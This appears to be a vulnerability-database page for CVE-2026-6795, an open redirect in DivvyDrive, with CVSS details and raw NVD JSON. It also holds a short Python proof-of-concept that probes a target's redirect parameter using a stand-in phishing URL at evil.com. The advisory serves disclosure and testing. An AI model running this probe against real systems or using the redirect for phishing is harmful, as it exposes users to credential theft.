Security Vulnerability Report
中文
CVE-2026-6795 CVSS 9.6 CRITICAL

CVE-2026-6795

Published: 2026-05-07 14:16:04
Last Modified: 2026-05-07 14:42:41

Description

URL redirection to untrusted site ('open redirect') vulnerability in DivvyDrive Information Technologies Inc. DivvyDrive allows Parameter Injection. This issue affects DivvyDrive: from 4.8.2.9 before 4.8.3.2.

CVSS Details

CVSS Score
9.6
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

DivvyDrive 4.8.2.9
DivvyDrive < 4.8.3.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def check_open_redirect(target_url, payload): """ Check for Open Redirect vulnerability by sending a payload and inspecting the 'Location' header of the response. """ # Example vulnerable parameter might be 'url', 'redirect', 'next', etc. # Adjust the parameter name based on the specific application behavior. params = { "redirect": payload } try: # Send the request without following redirects response = requests.get(target_url, params=params, allow_redirects=False, timeout=5) # Check if the response is a 302 Redirect if response.status_code == 302 or response.status_code == 301: location = response.headers.get('Location') print(f"[+] Status Code: {response.status_code}") print(f"[+] Location Header: {location}") if payload in location: print("[!] Vulnerability Confirmed: The application redirects to the external payload.") return True else: print("[-] Vulnerability Not Found: Redirect did not follow the payload.") return False else: print(f"[-] Unexpected Status Code: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[Error] Request failed: {e}") return False if __name__ == "__main__": # Replace with the actual target endpoint target = "http://target-divvydrive.com/api/redirect" # Malicious site to redirect to malicious_payload = "http://evil.com/phishing" print(f"[*] Testing {target} for Open Redirect...") check_open_redirect(target, malicious_payload)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-6795", "sourceIdentifier": "[email protected]", "published": "2026-05-07T14:16:04.280", "lastModified": "2026-05-07T14:42:40.917", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "URL redirection to untrusted site ('open redirect') vulnerability in DivvyDrive Information Technologies Inc. DivvyDrive allows Parameter Injection.\n\nThis issue affects DivvyDrive: from 4.8.2.9 before 4.8.3.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.6, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-601"}]}], "references": [{"url": "https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0182", "source": "[email protected]"}]}}